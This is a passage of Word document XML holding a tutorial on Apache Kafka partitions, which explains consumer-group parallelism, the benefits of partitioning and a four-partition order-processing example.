        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or thread) within a consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15163765" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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When a Kafka consumer group is consuming messages from a topic, each consumer in the group reads from one or more partitions. Since each partition is independent, multiple consumers can read from different partitions simultaneously, allowing the consumers to process messages in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057CD93" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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This parallelism ensures that Kafka can handle large amounts of data and scale horizontally by adding more partitions or consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13763681" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>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Scaling Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915ABE2" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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The number of partitions defines the maximum parallelism for a topic. If you have more consumers than partitions, some consumers will remain idle since a partition can only be read by one consumer in a group at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FDFB6" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>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If you increase the number of partitions, you increase the potential for parallelism and scalability. However, there is no advantage to having more consumers than partitions because each consumer will be assigned a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E5FE17" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319"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Benefits of Distributing Data Across Multiple Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51A24D" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>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High Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC5E07" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">By distributing data across multiple partitions, Kafka can handle more messages per second. Since multiple consumers can read from different partitions in parallel, Kafka achieves </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and faster message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30402EB3" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>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Improved Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C621E" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Kafka can replicate each partition across multiple brokers, ensuring data availability even if a broker fails. If a broker containing a partition fails, another broker with a replica of that partition can take over, ensuring no data loss and uninterrupted message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CF19C" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Replication enhances fault tolerance, making Kafka highly available and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADF045" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>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Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E777FC" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Partitions help with </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because different partitions can be distributed across different brokers. This prevents any single broker from becoming a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF2CE31" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Each consumer group can scale by increasing the number of consumers. Each consumer reads from a different partition, allowing the overall processing load to be distributed evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD3139" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>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Message Ordering Within a Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB648A0" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Kafka guarantees </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a single partition. While messages across partitions may not be ordered, Kafka ensures that messages within a partition are always consumed in the same order they were produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680CF1B2" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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This is crucial for use cases where the order of messages is important, such as financial transactions, where consistency and sequencing are essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1361E" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>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Horizontal Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA611C9" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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 xml:space="preserve">Kafka partitions enable </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. As the volume of data grows, you can add more partitions and brokers to increase Kafka’s capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000533A6" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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More partitions allow more consumers to work in parallel, which results in better utilization of system resources (e.g., CPU, memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629B22CC" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>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Improved Storage Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492CE7D" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Each partition can be stored on a different broker, which helps in distributing storage loads. Kafka can store large amounts of data across many machines, and partitions help organize this data efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F088C11" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>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Since partitions are log-based, Kafka can store messages in a compact and efficient manner, which helps with handling massive streams of real-time data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F24F5A" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319"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Practical Example of Kafka Partitions in Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB0E1A" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Suppose you have a Kafka topic order_topic with 4 partitions, and you want to process customer orders. The orders come from various regions, and you want to process them in parallel for better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8F68E" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>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Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>The producer sends messages (orders) to the topic, and Kafka assigns them to partitions based on the order’s region or randomly, depending on the partitioning strategy. Let’s assume the orders from regions A, B, C, and D are distributed across four partitions.</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1012"/>
        <w:gridCol w:w="1934"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="2F36F1F2" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BD769D8" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319"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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72046F83" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319"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Messages (Orders)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="69C21DC0" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69ECA668" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Partition 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B8C749" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Order from Region A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="63DE9D1B" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56FC2D9C" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Partition 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236E91DD" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Order from Region B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="7301EFAD" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E3DFC22" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Partition 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AFE90B2" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Order from Region C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E5BA7" w:rsidRPr="008E5BA7" w14:paraId="314D37FE" w14:textId="77777777" w:rsidTr="00304319">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C54B915" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Partition 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="494D3092" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Order from Region D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A69D4C6" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>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Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>A consumer group order-consumers with 4 consumers is assigned to the topic. Each consumer reads from one partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914B766" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1339"/>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Consumer 1 reads from Partition 0 (Region A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACCAD7B" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1339"/>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Consumer 2 reads from Partition 1 (Region B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592810F6" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1339"/>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Consumer 3 reads from Partition 2 (Region C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F9FEE" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1339"/>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Consumer 4 reads from Partition 3 (Region D).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6547633F" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="0030431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Since each partition is read by a different consumer in parallel, the system can handle multiple orders at the same time, improving throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB75667" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>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Fault Tolerance and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>If a broker fails, one of the replicas of the partition takes over as the leader, and the consumers can continue processing without interruption. Kafka automatically handles the failover process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7AAA8C" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of Kafka Partitioning Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEDA3E3" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>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lastRenderedPageBreak/>
        <w:t>Parallel Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka partitions allow multiple consumers to process messages simultaneously, improving data consumption rates and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB50BEF" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka scales horizontally by adding more partitions, which increases parallelism and overall capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5597D32C" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>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Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partition replication ensures that data is available even if a broker fails, enhancing reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D28DC" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>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High Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partitions help distribute the processing load across multiple brokers, achieving higher throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E654CA7" w14:textId="77777777" w:rsidR="00304319" w:rsidRPr="008E5BA7" w:rsidRDefault="00304319" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1340"/>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Efficient Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Partitions allow for better load distribution, preventing any broker from becoming a bottleneck.</w:t>
      </w:r>
    </w:p>
